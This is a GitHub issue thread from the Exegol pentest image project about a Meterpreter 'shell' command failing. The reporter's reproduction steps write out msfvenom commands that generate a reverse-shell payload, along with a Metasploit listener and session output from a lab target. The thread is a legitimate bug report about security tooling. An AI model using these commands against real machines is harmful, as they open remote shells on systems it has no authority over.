search

ThePorgs / Exegol-images

Docker images of the Exegol project
https://exegol.readthedocs.io/
GNU General Public License v3.0
89 stars 69 forks source link

Meterpreter Shell Opening Error on Exegol After Obtaining Session #408

Closed HeaZzY closed 1 week ago

HeaZzY commented 1 week ago

Describe the bug

After launching an attack using Metasploit on Exegol (Nightly version), the Meterpreter session is successfully created, but the shell fails to open. This unexpected behavior prevents interaction with the target machine through the obtained session.

Expected behavior: An interactive shell should open after successfully obtaining the Meterpreter session.

Steps To Reproduce

Context

Machine A: Exegol Nightly Machine B: Debian VM with Metasploit Machine C: Target machine (Linux or Windows, adapt the payload accordingly) a linux machine for me

First PoC via Exegol

Create the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f elf > rev.elf

Launch Metasploit in the Exegol container

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; run"

Execute the payload on Machine C

./rev.elf

Try to open a shell on the obtained session

[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:49820) at 2024-10-24 20:14:27 +0200

meterpreter > shell
Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

Result: The session is created, but opening the shell fails.

metas1

PoC via a VM

Create the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f elf > rev.elf

Launch Metasploit in the container

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; run"

Execute the payload on Machine C

./rev.elf

Try to open a shell on the obtained session

[*] Started reverse TCP handler on 10.10.14.7:80
[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:5640) at 2024-10-24 20:32:26 +0200

meterpreter > shell
Process 3145 created.
Channel 1 created.

whoami
riley

metas2

Exegol Wrapper Version

PS C:\Users\heazzy> python -m exegol version -vvv
[*] Exegol is currently in version v4.3.6
[*] Exegol Discord serv.: https://discord.gg/cXThyp7D6P
[*] Exegol documentation: https://exegol.rtfd.io/
[D] Pip installation: On ✔
[D] Git source installation: Off 🪓
[D] Host OS: Windows (WSL2)
[D] Arch: amd64
[D] Windows release: 10.0.22631
[D] Python environment: Windows
[D] Docker engine: WSL2
[D] Docker desktop: On ✔
[D] Shell type: Windows
[D] Last wrapper update check: 21/10/2024

Exegol container information

[*] Exegol is currently in version v4.3.6
[*] Exegol Discord serv.: https://discord.gg/cXThyp7D6P
[*] Exegol documentation: https://exegol.rtfd.io/
[V] Listing user configurations

🧠 User configurations
┌────────────────────────────────────────────────────────────┐
│ User config file: C:\Users\heazzy\.exegol\config.yml       │
│ Private workspace: C:\Users\heazzy\.exegol\workspaces      │
│ Exegol resources: C:\Users\heazzy\.exegol\exegol-resources │
│ My resources: C:\Users\heazzy\.exegol\my-resources         │
│ Auto-check updates: On ✔                                   │
│ Auto-remove images: On ✔                                   │
│ Auto-update fs: Off 🪓                                     │
│ Default start shell: zsh                                   │
│ Shell logging method: asciinema                            │
│ Shell logging compression: On ✔                            │
│ Desktop enabled by default: Off 🪓                         │
│ Desktop default protocol: http                             │
│ Desktop default host: localhost                            │
└────────────────────────────────────────────────────────────┘

[V] Listing git repositories
[!] Exegol has not been installed via git clone. Skipping wrapper auto-update operation.
[*] If you have installed Exegol with pip, check for an update with the command pip3 install exegol --upgrade
[!] Exegol has not been installed via git clone. Skipping wrapper auto-update operation.
[*] If you have installed Exegol with pip, check for an update with the command pip3 install exegol --upgrade

🐙 Project modules
┌───────────┬───────────────┬────────────────┐
│ Name      │ Status        │ Current branch │
├───────────┼───────────────┼────────────────┤
│ Wrapper   │ Not installed │ ? 🤷           │
│ Images    │ Not installed │ ? 🤷           │
│ Resources │ Up to date    │ main           │
└───────────┴───────────────┴────────────────┘

⭐ Container summary
┌──────────────────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│             Name │ test2 (Running)                                                                                                       │
│            Image │ nightly - v.b6d1cef2 (Up to date) (amd64)                                                                             │
├──────────────────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤
│      Credentials │ root : RuCGMBvHi9yKXsY0noYbkmLGDO2E25                                                                                 │
│   Remote Desktop │ Off 🪓                                                                                                                │
│    Creation date │ 24/10/2024 20:09                                                                                                      │
│      Console GUI │ On ✔ (X11)                                                                                                            │
│          Network │ bridge with VPN                                                                                                       │
│         Timezone │ On ✔                                                                                                                  │
│ Exegol resources │ On ✔ (/opt/resources)                                                                                                 │
│     My resources │ On ✔ (/opt/my-resources)                                                                                              │
│    Shell logging │ Off 🪓                                                                                                                │
│              VPN │ pro_labs_Heazzy.ovpn                                                                                                  │
│       Privileged │ Off ✔                                                                                                                 │
│     Capabilities │ NET_ADMIN                                                                                                             │
│        Workspace │ Dedicated (/workspace)                                                                                                │
│          Devices │ /dev/net/tun:/dev/net/tun:rwm                                                                                         │
│             Envs │ DISPLAY=:0                                                                                                            │
│                  │ _JAVA_AWT_WM_NONREPARENTING=1                                                                                         │
│                  │ QT_X11_NO_MITSHM=1                                                                                                    │
│                  │ TZ=Europe/Paris                                                                                                       │
│                  │ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                                                     │
│          Volumes │ (RO) C:/Users/heazzy/AppData/Roaming/Python/Python312/site-packages/exegol/utils/imgsync/spawn.sh ➡ /.exegol/spawn.sh │
│                  │ (RW) \\wsl.localhost\Ubuntu-22.04\mnt\wslg\.X11-unix ➡ /tmp/.X11-unix                                                 │
│                  │ (RW) C:/Users/heazzy/.exegol/my-resources ➡ /opt/my-resources                                                         │
│                  │ (RW) C:/Users/heazzy/.exegol/exegol-resources ➡ /opt/resources                                                        │
│                  │ (RO) C:/Users/heazzy/pro_labs_Heazzy.ovpn ➡ /.exegol/vpn/config/client.ovpn                                           │
│                  │ (RW) C:/Users/heazzy/.exegol/workspaces/test2 ➡ /workspace                                                            │
│         Systctls │ net.ipv6.conf.all.disable_ipv6 = 0                                                                                    │
└──────────────────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘

Exception

No response

Additional context

[Oct 24, 2024 - 20:52:45 (CEST)] exegol-test2 /workspace # zcat /var/log/exegol/load_setups.log.gz || cat /var/log/exegol/load_setups.log
[EXEGOL] This log file is the result of the execution of the official and personal customization script
[EXEGOL] [24-10-2024_20-09-38] ==== Loading custom setups (/.exegol/load_supported_setups.sh) ====
[EXEGOL] Initialization
[EXEGOL] Checking environment variables
HOSTNAME=exegol-test2
PWD=/workspace
TZ=Europe/Paris
HOME=/root
_JAVA_AWT_WM_NONREPARENTING=1
TERM=xterm-256color
DISPLAY=:0
SHLVL=2
PATH=/root/.nvm/versions/node/v23.0.0/bin:/root/.asdf/shims:/root/.asdf/bin:/root/.pyenv/shims:/root/.pyenv/bin:/root/.local/bin:/opt/tools/john/run:/opt/tools/bin:/usr/local/rvm/gems/ruby-3.2.2/bin:/usr/local/rvm/gems/ruby-3.2.2@global/bin:/usr/local/rvm/rubies/ruby-3.2.2/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/rvm/bin:/opt/my-resources/bin:/root/.dotnet:/root/.dotnet/tools:/opt/tools/fzf/bin
QT_X11_NO_MITSHM=1
_=/usr/bin/env
LOGNAME=root
OLDPWD=/workspace
rvm_prefix=/usr/local
rvm_path=/usr/local/rvm
rvm_bin_path=/usr/local/rvm/bin
rvm_version=1.29.12-next (master)
GEM_HOME=/usr/local/rvm/gems/ruby-3.2.2
GEM_PATH=/usr/local/rvm/gems/ruby-3.2.2:/usr/local/rvm/gems/ruby-3.2.2@global
MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.2.2
IRBRC=/usr/local/rvm/rubies/ruby-3.2.2/.irbrc
RUBY_VERSION=ruby-3.2.2
GO111MODULE=auto
JOHN=/opt/tools/john/run
LC_ALL=en_US.UTF-8
LANG=en_US.UTF-8
LANGUAGE=en_US:en
PYENV_ROOT=/root/.pyenv
PYENV_SHELL=zsh
DOTNET_ROOT=/root/.dotnet
ZSH=/root/.oh-my-zsh
FZF_BASE=/opt/tools/fzf
ASDF_DIR=/root/.asdf
GOPATH=/root/.asdf/installs/golang/1.22.2/packages
PAGER=less
LESS=-R
LSCOLORS=Gxfxcxdxbxegedabagacad
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.swp=00;90:*.tmp=00;90:*.dpkg-dist=00;90:*.dpkg-old=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:
ZSH_TMUX_TERM=screen
ZSH_TMUX_CONFIG=/root/.tmux.conf
_ZSH_TMUX_FIXED_CONFIG=/root/.oh-my-zsh/plugins/tmux/tmux.extra.conf
NVM_DIR=/root/.nvm
NVM_CD_FLAGS=-q
NVM_BIN=/root/.nvm/versions/node/v23.0.0/bin
NVM_INC=/root/.nvm/versions/node/v23.0.0/include/node
HISTFILESIZE=1000000000
HISTSIZE=1000000000
HISTTIMEFORMAT=[%F %T]
RED=\033[1;31m
BLUE=\033[1;34m
GREEN=\033[1;32m
NOCOLOR=\033[0m
[EXEGOL] Deploying /opt/my-resources
[EXEGOL] Copying README.md to /opt/my-resources
[EXEGOL] Deploying zsh
[EXEGOL] Deploying tmux
[EXEGOL] Deploying vim
[EXEGOL] Deploying nvim
[EXEGOL] Deploying APT packages
[EXEGOL] No APT package to install.
[EXEGOL] Deploying python3 packages
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable.It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.
[EXEGOL] Deploying Firefox Add-Ons
[-] No addons were found in the list /opt/my-resources/setup/firefox/addons.txt

[-] No addons were found in the folder /opt/my-resources/setup/firefox/addons

[-] No addons were found.
[EXEGOL] Deploying BloodHound
[EXEGOL] Deploying BloodHound User Config
[EXEGOL] Merging User Custom Queries for BloodHound, and overwriting Exegol Custom Queries
[EXEGOL] Merging User Custom Queries with Exegol Custom Queries for BloodHound
[EXEGOL] Trusting Burp CA certificate in Firefox
[*] Generating Burp CA and trusting in Firefox
[*] Looking for available port
[*] Preparing burp configuration file
[*] Starting Burp and waiting for proxy to listen
Oct 24, 2024 8:09:39 PM java.util.prefs.FileSystemPreferences$1 run
INFO: Created user preferences directory.
[*] Retrieving CA
[*] Trusting cert PortSwigger CA (/tmp/cacert.der) in Firefox
[+] CA trusted successfully
[EXEGOL] Trusting user CA certificates in Firefox
[EXEGOL] Deploying custom arsenal cheatsheet
[EXEGOL] Executing user setup
[EXEGOL] [24-10-2024_20-09-48] ==== Loading user setup (/opt/my-resources/setup/load_user_setup.sh) ====
[EXEGOL] Installing my-resources user's defined custom setup ...
[EXEGOL] [24-10-2024_20-09-48] ==== End of custom setups loading ====
[Oct 24, 2024 - 20:52:48 (CEST)] 
exegol-test2 /workspace #

Anything else?

With Debian VM

metas2

With Exegol Nightly on windows

metas1

Test on windows ARM machine

With Exegol FULL

metasploit2

With ubuntu wsl

metasploit1

QU35T-code commented 1 week ago

Thank you very much for the PoC, I will try to reproduce and fix it quickly!!!

QU35T-code commented 1 week ago

@HeaZzY,

After testing, the issue comes from metasploit and not exegol :/ This is now fixed and will be deployed on the new nightly image. Thanks for this comprehensive and understandable issue !

https://github.com/rapid7/metasploit-framework/issues/19569

Screenshot 2024-10-24 at 22 47 36
abbashaider562 commented 3 days ago

@HeaZzY,

After testing, the issue comes from metasploit and not exegol :/ This is now fixed and will be deployed on the new nightly image. Thanks for this comprehensive and understandable issue !

rapid7/metasploit-framework#19569

Screenshot 2024-10-24 at 22 47 36

Is this issue resolved, I am having the same issue ?